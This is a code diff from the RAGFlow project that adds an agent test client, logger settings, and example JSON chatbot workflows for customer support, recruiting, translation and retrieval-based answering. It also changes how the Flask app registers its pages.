# See the License for the specific language governing permissions and
# limitations under the License.
#
# Logger
import os
from api.utils.file_utils import get_project_base_directory
from api.utils.log_utils import LoggerFactory, getLogger
DEBUG = 0
LoggerFactory.set_directory(
os.path.join(
get_project_base_directory(),
"logs",
"flow"))
# {CRITICAL: 50, FATAL:50, ERROR:40, WARNING:30, WARN:30, INFO:20, DEBUG:10, NOTSET:0}
LoggerFactory.LEVEL = 30
flow_logger = getLogger("flow")
database_logger = getLogger("database")
FLOAT_ZERO = 1e-8
PARAM_MAXDEPTH = 5

File diff suppressed because one or more lines are too long

48
agent/test/client.py Normal file

@ -0,0 +1,48 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import os
from functools import partial
from agent.canvas import Canvas
from agent.settings import DEBUG
if __name__ == '__main__':
parser = argparse.ArgumentParser()
dsl_default_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"dsl_examples",
"retrieval_and_generate.json",
)
parser.add_argument('-s', '--dsl', default=dsl_default_path, help="input dsl", action='store', required=False)
parser.add_argument('-t', '--tenant_id', help="Tenant ID", action='store', required=True)
parser.add_argument('-m', '--stream', default=False, help="Stream output", action='store_true', required=False)
args = parser.parse_args()
canvas = Canvas(open(args.dsl, "r").read(), args.tenant_id)
while True:
ans = canvas.run(stream=args.stream)
print("==================== Bot =====================\n> ", end='')
if args.stream and isinstance(ans, partial):
cont = ""
for an in ans():
print(an["content"][len(cont):], end='', flush=True)
cont = an["content"]
else:
print(ans["content"])
if DEBUG: print(canvas.path)
question = input("\n==================== User =====================\n> ")
canvas.add_user_input(question)
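
Note on the streaming loop in the client: each streamed item carries the full answer so far, so the client prints only the part that was not shown yet. A minimal standalone sketch of that pattern follows; `fake_stream` is a hypothetical stand-in for the partial returned by `canvas.run(stream=True)`, and `deltas` is an illustrative helper.

```python
def fake_stream():
    """Stand-in for a streaming answer: each chunk holds the text so far."""
    text = "Hello, world"
    for end in (5, 7, len(text)):
        yield {"content": text[:end]}


def deltas(chunks):
    """Yield only the newly added suffix of each cumulative chunk."""
    seen = ""
    for chunk in chunks:
        yield chunk["content"][len(seen):]
        seen = chunk["content"]


if __name__ == "__main__":
    for piece in deltas(fake_stream()):
        print(piece, end="", flush=True)
    print()
```

This assumes every chunk extends the previous one; if a later chunk rewrote earlier text, slicing by length would drop or duplicate characters.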

@ -0,0 +1,45 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["categorize:0"],
"upstream": ["begin"]
},
"categorize:0": {
"obj": {
"component_name": "Categorize",
"params": {
"llm_id": "deepseek-chat",
"category_description": {
"product_related": {
"description": "The question is about the product usage, appearance and how it works.",
"examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?"
},
"others": {
"description": "The question is not about the product usage, appearance and how it works.",
"examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?"
}
}
}
},
"downstream": [],
"upstream": ["answer:0"]
}
},
"history": [],
"path": [],
"answer": []
}
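
Each component in the DSL above names its neighbours twice: once in its own `downstream` list and once in the neighbour's `upstream` list. A minimal sketch of a consistency check follows. It assumes the two lists are meant to mirror each other, which the examples suggest but which is not confirmed here; `check_dsl_links` is a hypothetical helper and not part of the agent package.

```python
import json
from typing import Dict, List


def check_dsl_links(dsl: Dict) -> List[str]:
    """Return human-readable problems found in the components graph."""
    components = dsl.get("components", {})
    problems = []
    for name, comp in components.items():
        for direction, reverse in (("downstream", "upstream"), ("upstream", "downstream")):
            for other in comp.get(direction, []):
                if other not in components:
                    problems.append(f"{name}: {direction} '{other}' is not defined")
                elif name not in components[other].get(reverse, []):
                    problems.append(f"{name}: {direction} '{other}' lacks matching {reverse}")
    return problems


if __name__ == "__main__":
    example = json.loads("""
    {
      "components": {
        "begin": {"downstream": ["answer:0"], "upstream": []},
        "answer:0": {"downstream": ["categorize:0"], "upstream": ["begin"]},
        "categorize:0": {"downstream": [], "upstream": ["answer:0"]}
      }
    }
    """)
    print(check_dsl_links(example) or "graph is consistent")
```

Running a check like this over every example file before loading it would surface dangling component IDs early.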


@ -0,0 +1,157 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi! How can I help you?"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["categorize:0"],
"upstream": ["begin", "generate:casual", "generate:answer", "generate:complain", "generate:ask_contact", "message:get_contact"]
},
"categorize:0": {
"obj": {
"component_name": "Categorize",
"params": {
"llm_id": "deepseek-chat",
"category_description": {
"product_related": {
"description": "The question is about the product usage, appearance and how it works.",
"examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?\nException: Can't connect to ES cluster\nHow to build the RAGFlow image from scratch",
"to": "retrieval:0"
},
"casual": {
"description": "The question is not about the product usage, appearance and how it works. Just casual chat.",
"examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
"to": "generate:casual"
},
"complain": {
"description": "The user complains about, or even curses, the product or service you provide, but the comment is not specific enough.",
"examples": "How bad is it.\nIt's really sucks.\nDamn, for God's sake, can it be more steady?\nShit, I just can't use this shit.\nI can't stand it anymore.",
"to": "generate:complain"
},
"answer": {
"description": "The answer provides specific contact information, such as e-mail, phone number, WeChat ID, LINE ID, Twitter, Discord, etc.",
"examples": "My phone number is 203921\nkevinhu.hk@gmail.com\nThis is my discord number: johndowson_29384",
"to": "message:get_contact"
}
},
"message_history_window_size": 8
}
},
"downstream": ["retrieval:0", "generate:casual", "generate:complain", "message:get_contact"],
"upstream": ["answer:0"]
},
"generate:casual": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are a customer support agent, but the customer wants to have a casual chat with you instead of asking about the product. Be nice, funny, enthusiastic and caring.",
"temperature": 0.9,
"message_history_window_size": 12,
"cite": false
}
},
"downstream": ["answer:0"],
"upstream": ["categorize:0"]
},
"generate:complain": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are a customer support agent. The customer is complaining about, or even cursing, the product, but is not being specific. Ask what the specific problem with the product is. Be nice, patient and caring, and soothe the customer's emotions first.",
"temperature": 0.9,
"message_history_window_size": 12,
"cite": false
}
},
"downstream": ["answer:0"],
"upstream": ["categorize:0"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["869a236818b811ef91dffa163e197198"]
}
},
"downstream": ["relevant:0"],
"upstream": ["categorize:0"]
},
"relevant:0": {
"obj": {
"component_name": "Relevant",
"params": {
"llm_id": "deepseek-chat",
"temperature": 0.02,
"yes": "generate:answer",
"no": "generate:ask_contact"
}
},
"downstream": ["generate:answer", "generate:ask_contact"],
"upstream": ["retrieval:0"]
},
"generate:answer": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature": 0.02
}
},
"downstream": ["answer:0"],
"upstream": ["relevant:0"]
},
"generate:ask_contact": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are a customer support agent, but you can't answer the customer's question. Ask for their contact information, such as e-mail, phone number, WeChat ID, LINE ID, Twitter, Discord, etc. Product experts will contact them later. Please do not ask the same question twice.",
"temperature": 0.9,
"message_history_window_size": 12,
"cite": false
}
},
"downstream": ["answer:0"],
"upstream": ["relevant:0"]
},
"message:get_contact": {
"obj":{
"component_name": "Message",
"params": {
"messages": [
"Okay, I've written this down. What else can I do for you?",
"Got it. What else can I do for you?",
"Thanks for your trust! Our expert will contact you ASAP. So, is there anything else I can do for you?",
"Thanks! So, is there anything else I can do for you?"
]
}
},
"downstream": ["answer:0"],
"upstream": ["categorize:0"]
}
},
"history": [],
"messages": [],
"path": [],
"reference": [],
"answer": []
}


@ -0,0 +1,210 @@
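{
"components": {
"begin": {
"obj": {
"component_name": "Begin",
"params": {
"prologue": "Hello, I'm a headhunter focusing on AGI. I learned that you are an expert in this field, so I took the liberty of reaching out. I have an opportunity I'd like to share with you: RAGFlow is hiring senior engineers for your role. Would you be interested?"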
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["categorize:0"],
"upstream": ["begin", "message:reject"]
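},
"categorize:0": {
"obj": {
"component_name": "Categorize",
"params": {
"llm_id": "deepseek-chat",
"category_description": {
"about_job": {
"description": "The question is about the position itself or about the company.",
"examples": "What's the position?\nWho would I report to?\nHow many people are in the company?\nWhat products does the company have?\nWhat exactly does the job involve?\nWhere is it located?\nAre weekends off?",
"to": "retrieval:0"
},
"casual": {
"description": "The question is not about the position or the company; it is just casual chat.",
"examples": "Hello\nLong time no see\nAre you a man or a woman?\nAre you the reinforcements sent by the monkey?\nHad a meeting this morning?\nWhat's your name?\nHow's the market lately? Is business good?",
"to": "generate:casual"
},
"interested": {
"description": "The reply indicates that the candidate is interested in the position.",
"examples": "Mm-hm\nGo ahead\nTell me about it\nSounds okay\nThat's right\nOh\nyes\nTell me more",
"to": "message:introduction"
},
"answer": {
"description": "The reply indicates that the candidate is not interested in the position, or feels harassed.",
"examples": "No need\nNot interested\nNot looking for now\nNo thanks\nno\nI don't do this work anymore\nThis isn't my field",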
"to": "message:reject"
}
}
}
},
"downstream": [
"message:introduction",
"generate:casual",
"message:reject",
"retrieval:0"
],
"upstream": ["answer:0"]
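},
"message:introduction": {
"obj": {
"component_name": "Message",
"params": {
"messages": [
"Let me give a brief introduction:\nRAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine built on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale and for individuals, combining large language models (LLMs) to provide reliable question answering with well-grounded citations over users' data in various complex formats. https://github.com/infiniflow/ragflow\nIs there anything else you'd like to know?"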
]
}
},
"downstream": ["answer:1"],
"upstream": ["categorize:0"]
},
"answer:1": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["categorize:1"],
"upstream": [
"message:introduction",
"generate:aboutJob",
"generate:casual",
"generate:get_wechat",
"generate:nowechat"
]
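},
"categorize:1": {
"obj": {
"component_name": "Categorize",
"params": {
"llm_id": "deepseek-chat",
"category_description": {
"about_job": {
"description": "The question is about the position itself or about the company.",
"examples": "What's the position?\nWho would I report to?\nHow many people are in the company?\nWhat products does the company have?\nWhat exactly does the job involve?\nWhere is it located?\nAre weekends off?",
"to": "retrieval:0"
},
"casual": {
"description": "The question is not about the position or the company; it is just casual chat.",
"examples": "Hello\nLong time no see\nAre you a man or a woman?\nAre you the reinforcements sent by the monkey?\nHad a meeting this morning?\nWhat's your name?\nHow's the market lately? Is business good?",
"to": "generate:casual"
},
"wechat": {
"description": "The reply indicates that the candidate is willing to connect on WeChat, or has already given a WeChat ID.",
"examples": "Mm-hm\nSure\nThat's right\nOh\nyes\n15002333453\nwindblow_2231",
"to": "generate:get_wechat"
},
"giveup": {
"description": "The reply indicates that the candidate is unwilling to connect on WeChat.",
"examples": "No need\nNot interested\nNot looking for now\nNo thanks\nno\nIt's not convenient\nI didn't know you'd want to add me on WeChat",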
"to": "generate:nowechat"
}
},
"message_history_window_size": 8
}
},
"downstream": [
"retrieval:0",
"generate:casual",
"generate:get_wechat",
"generate:nowechat"
],
"upstream": ["answer:1"]
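},
"generate:casual": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are a headhunter focusing on AGI. The candidate has brought up a topic unrelated to the position. Respond patiently and steer the conversation back to the AGI position. Ideally, get the candidate's WeChat ID so that you can stay in touch.",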
"temperature": 0.9,
"message_history_window_size": 12,
"cite": false
}
},
"downstream": ["answer:1"],
"upstream": ["categorize:0", "categorize:1"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["869a236818b811ef91dffa163e197198"]
}
},
"downstream": ["generate:aboutJob"],
"upstream": ["categorize:0", "categorize:1"]
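},
"generate:aboutJob": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are a headhunter focusing on AGI. The candidate has asked about the position or the company; answer based on the job information below. If the job information does not cover the candidate's question, reply that you are not sure, do not know, or need to confirm. After answering, guide the candidate to share a WeChat ID, for example:\n - Would it be convenient to connect on WeChat? I'll send you the JD to look over.\n - What's your WeChat ID? I'll send you the detailed JD.\n The job information is as follows:\n {input}\n The above is the job information.",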
"temperature": 0.02
}
},
"downstream": ["answer:1"],
"upstream": ["retrieval:0"]
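},
"generate:get_wechat": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are a headhunter focusing on AGI. The candidate does not object to connecting on WeChat. If they have already given a WeChat ID, thank them for their trust and say you will add them right away; if not, ask for their WeChat ID. Your WeChat ID is weixin_kevin and your e-mail is kkk@ragflow.com. Do not repeat yourself. Do not keep opening with a greeting.",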
"temperature": 0.1,
"message_history_window_size": 12,
"cite": false
}
},
"downstream": ["answer:1"],
"upstream": ["categorize:1"]
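},
"generate:nowechat": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are a headhunter focusing on AGI. When you proposed connecting on WeChat, the candidate declined. Respond patiently and politely, show that you understand the wish to protect private information, and feel free to ask about their views and concerns regarding the position. At an appropriate moment, ask for their WeChat contact again. You may also encourage the candidate to reach out to you. Your WeChat ID is weixin_kevin and your e-mail is kkk@ragflow.com. Do not repeat yourself. Do not keep opening with a greeting.",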
"temperature": 0.1,
"message_history_window_size": 12,
"cite": false
}
},
"downstream": ["answer:1"],
"upstream": ["categorize:1"]
},
"message:reject": {
"obj": {
"component_name": "Message",
"params": {
"messages": [
"Okay, I wish you a happy life and success at work.",
"Oh, okay. Thank you for your valuable time!"
]
}
},
"downstream": ["answer:0"],
"upstream": ["categorize:0"]
}
},
"history": [],
"messages": [],
"path": [],
"reference": [],
"answer": []
}


@ -0,0 +1,39 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there! Please enter the text you want to translate in a format like: 'text you want to translate' => target language. For example: 您好! => English"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["generate:0"],
"upstream": ["begin", "generate:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are a professional interpreter.\n- Role: a professional interpreter.\n- Input format: content to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => Hello!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
"temperature": 0.5
}
},
"downstream": ["answer:0"],
"upstream": ["answer:0"]
}
},
"history": [],
"messages": [],
"reference": {},
"path": [],
"answer": []
}


@ -0,0 +1,39 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there! Please enter the text you want to translate in a format like: 'text you want to translate' => target language. For example: 您好! => English"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["generate:0"],
"upstream": ["begin", "generate:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are a professional interpreter.\n- Role: a professional interpreter.\n- Input format: content to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => Hello!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
"temperature": 0.5
}
},
"downstream": ["answer:0"],
"upstream": ["answer:0"]
}
},
"history": [],
"messages": [],
"reference": {},
"path": [],
"answer": []
}


@ -0,0 +1,62 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["keyword:0"],
"upstream": ["begin", "generate:1"]
},
"keyword:0": {
"obj": {
"component_name": "KeywordExtract",
"params": {
"llm_id": "deepseek-chat",
"prompt": "- Role: You're a question analyzer.\n - Requirements:\n - Summarize user's question, and give top %s important keyword/phrase.\n - Use comma as a delimiter to separate keywords/phrases.\n - Answer format: (in language of user's question)\n - keyword: ",
"temperature": 0.2,
"top_n": 1
}
},
"downstream": ["wikipedia:0"],
"upstream": ["answer:0"]
},
"wikipedia:0": {
"obj":{
"component_name": "Wikipedia",
"params": {
"top_n": 10
}
},
"downstream": ["generate:1"],
"upstream": ["keyword:0"]
},
"generate:1": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please answer the question based on content from Wikipedia. When the answer from Wikipedia is incomplete, you need to output the URL link of the corresponding content as well. When all the content searched from Wikipedia is irrelevant to the question, your answer must include the sentence, \"The answer you are looking for is not found in the Wikipedia!\". Answers need to consider chat history.\n The content of Wikipedia is as follows:\n {input}\n The above is the content of Wikipedia.",
"temperature": 0.2
}
},
"downstream": ["answer:0"],
"upstream": ["wikipedia:0"]
}
},
"history": [],
"path": [],
"messages": [],
"reference": {},
"answer": []
}


@ -0,0 +1,54 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["retrieval:0"],
"upstream": ["begin", "generate:0"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["869a236818b811ef91dffa163e197198"]
}
},
"downstream": ["generate:0"],
"upstream": ["answer:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
"temperature": 0.2
}
},
"downstream": ["answer:0"],
"upstream": ["retrieval:0"]
}
},
"history": [],
"messages": [],
"reference": {},
"path": [],
"answer": []
}


@ -0,0 +1,88 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["categorize:0"],
"upstream": ["begin", "generate:0", "message:0"]
},
"categorize:0": {
"obj": {
"component_name": "Categorize",
"params": {
"llm_id": "deepseek-chat",
"category_description": {
"product_related": {
"description": "The question is about the product usage, appearance and how it works.",
"examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?",
"to": "retrieval:0"
},
"others": {
"description": "The question is not about the product usage, appearance and how it works.",
"examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
"to": "message:0"
}
}
}
},
"downstream": ["retrieval:0", "message:0"],
"upstream": ["answer:0"]
},
"message:0": {
"obj":{
"component_name": "Message",
"params": {
"messages": [
"Sorry, I don't know. I'm an AI bot."
]
}
},
"downstream": ["answer:0"],
"upstream": ["categorize:0"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["869a236818b811ef91dffa163e197198"]
}
},
"downstream": ["generate:0"],
"upstream": ["categorize:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
"temperature": 0.2
}
},
"downstream": ["answer:0"],
"upstream": ["retrieval:0"]
}
},
"history": [],
"messages": [],
"reference": {},
"path": [],
"answer": []
}


@ -0,0 +1,82 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["retrieval:0"],
"upstream": ["begin", "generate:0", "message:0"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["869a236818b811ef91dffa163e197198"],
"empty_response": "Sorry, the knowledge base has no related information."
}
},
"downstream": ["relevant:0"],
"upstream": ["answer:0"]
},
"relevant:0": {
"obj": {
"component_name": "Relevant",
"params": {
"llm_id": "deepseek-chat",
"temperature": 0.02,
"yes": "generate:0",
"no": "message:0"
}
},
"downstream": ["message:0", "generate:0"],
"upstream": ["retrieval:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature": 0.2
}
},
"downstream": ["answer:0"],
"upstream": ["relevant:0"]
},
"message:0": {
"obj":{
"component_name": "Message",
"params": {
"messages": [
"Sorry, I don't know. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
"I'm an AI bot and not quite sure about this question. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
"Can't find answer in my knowledge base. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?"
]
}
},
"downstream": ["answer:0"],
"upstream": ["relevant:0"]
}
},
"history": [],
"path": [],
"messages": [],
"reference": {},
"answer": []
}


@ -0,0 +1,103 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["retrieval:0"],
"upstream": ["begin", "generate:0", "generate:1"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["21ca4e6a2c8911ef8b1e0242ac120006"],
"empty_response": "Sorry, the knowledge base has no related information."
}
},
"downstream": ["relevant:0"],
"upstream": ["answer:0"]
},
"relevant:0": {
"obj": {
"component_name": "Relevant",
"params": {
"llm_id": "deepseek-chat",
"temperature": 0.02,
"yes": "generate:0",
"no": "keyword:0"
}
},
"downstream": ["keyword:0", "generate:0"],
"upstream": ["retrieval:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature": 0.2
}
},
"downstream": ["answer:0"],
"upstream": ["relevant:0"]
},
"keyword:0": {
"obj": {
"component_name": "KeywordExtract",
"params": {
"llm_id": "deepseek-chat",
"prompt": "- Role: You're a question analyzer.\n - Requirements:\n - Summarize user's question, and give top %s important keyword/phrase.\n - Use comma as a delimiter to separate keywords/phrases.\n - Answer format: (in language of user's question)\n - keyword: ",
"temperature": 0.2,
"top_n": 1
}
},
"downstream": ["baidu:0"],
"upstream": ["relevant:0"]
},
"baidu:0": {
"obj":{
"component_name": "Baidu",
"params": {
"top_n": 10
}
},
"downstream": ["generate:1"],
"upstream": ["keyword:0"]
},
"generate:1": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please answer the question based on content searched from Baidu. When the answer from a Baidu search is incomplete, you need to output the URL link of the corresponding content as well. When all the content searched from Baidu is irrelevant to the question, your answer must include the sentence, \"The answer you are looking for is not found in the Baidu search!\". Answers need to consider chat history.\n The content of Baidu search is as follows:\n {input}\n The above is the content of Baidu search.",
"temperature": 0.2
}
},
"downstream": ["answer:0"],
"upstream": ["baidu:0"]
}
},
"history": [],
"path": [],
"messages": [],
"reference": {},
"answer": []
}


@ -0,0 +1,79 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["retrieval:0"],
"upstream": ["begin", "generate:0"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["869a236818b811ef91dffa163e197198"],
"empty_response": "Sorry, the knowledge base has no related information."
}
},
"downstream": ["relevant:0"],
"upstream": ["answer:0", "rewrite:0"]
},
"relevant:0": {
"obj": {
"component_name": "Relevant",
"params": {
"llm_id": "deepseek-chat",
"temperature": 0.02,
"yes": "generate:0",
"no": "rewrite:0"
}
},
"downstream": ["generate:0", "rewrite:0"],
"upstream": ["retrieval:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature": 0.02
}
},
"downstream": ["answer:0"],
"upstream": ["relevant:0"]
},
"rewrite:0": {
"obj":{
"component_name": "RewriteQuestion",
"params": {
"llm_id": "deepseek-chat",
"temperature": 0.8
}
},
"downstream": ["retrieval:0"],
"upstream": ["relevant:0"]
}
},
"history": [],
"messages": [],
"path": [],
"reference": [],
"answer": []
}


@ -25,7 +25,7 @@ from flask_cors import CORS
from api.db import StatusEnum
from api.db.db_models import close_connection
from api.db.services import UserService
from api.utils import CustomJSONEncoder
from api.utils import CustomJSONEncoder, commands
from flask_session import Session
from flask_login import LoginManager
@ -60,15 +60,21 @@ Session(app)
login_manager = LoginManager()
login_manager.init_app(app)
commands.register_commands(app)
def search_pages_path(pages_dir):
return [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
app_path_list = [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
api_path_list = [path for path in pages_dir.glob('*_api.py') if not path.name.startswith('.')]
app_path_list.extend(api_path_list)
return app_path_list
def register_page(page_path):
page_name = page_path.stem.rstrip('_app')
module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name, ))
path = f'{page_path}'
page_name = page_path.stem.rstrip('_api') if "_api" in path else page_path.stem.rstrip('_app')
module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name,))
spec = spec_from_file_location(module_name, page_path)
page = module_from_spec(spec)
@ -76,9 +82,8 @@ def register_page(page_path):
page.manager = Blueprint(page_name, module_name)
sys.modules[module_name] = page
spec.loader.exec_module(page)
page_name = getattr(page, 'page_name', page_name)
url_prefix = f'/{API_VERSION}/{page_name}'
url_prefix = f'/api/{API_VERSION}/{page_name}' if "_api" in path else f'/{API_VERSION}/{page_name}'
app.register_blueprint(page.manager, url_prefix=url_prefix)
return url_prefix
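
A note on `page_path.stem.rstrip('_app')` and `rstrip('_api')`: `str.rstrip` treats its argument as a set of characters, not as a literal suffix, so a stem whose base name ends in `_`, `a`, `p` (or `i` for the `_api` case) would be trimmed too far. A minimal sketch of a suffix-safe alternative follows, assuming Python 3.9+ for `str.removesuffix`. `page_name_from_stem` is a hypothetical helper for illustration, not code from this change.

```python
def page_name_from_stem(stem: str) -> str:
    """Strip a literal '_api' or '_app' suffix from a module stem (hypothetical helper)."""
    for suffix in ("_api", "_app"):
        if stem.endswith(suffix):
            return stem.removesuffix(suffix)  # Python 3.9+
    return stem


if __name__ == "__main__":
    # rstrip works on a character set, so it also eats the "ap" at the end of "sitemap".
    print("sitemap_app".rstrip("_app"))
    print(page_name_from_stem("sitemap_app"))
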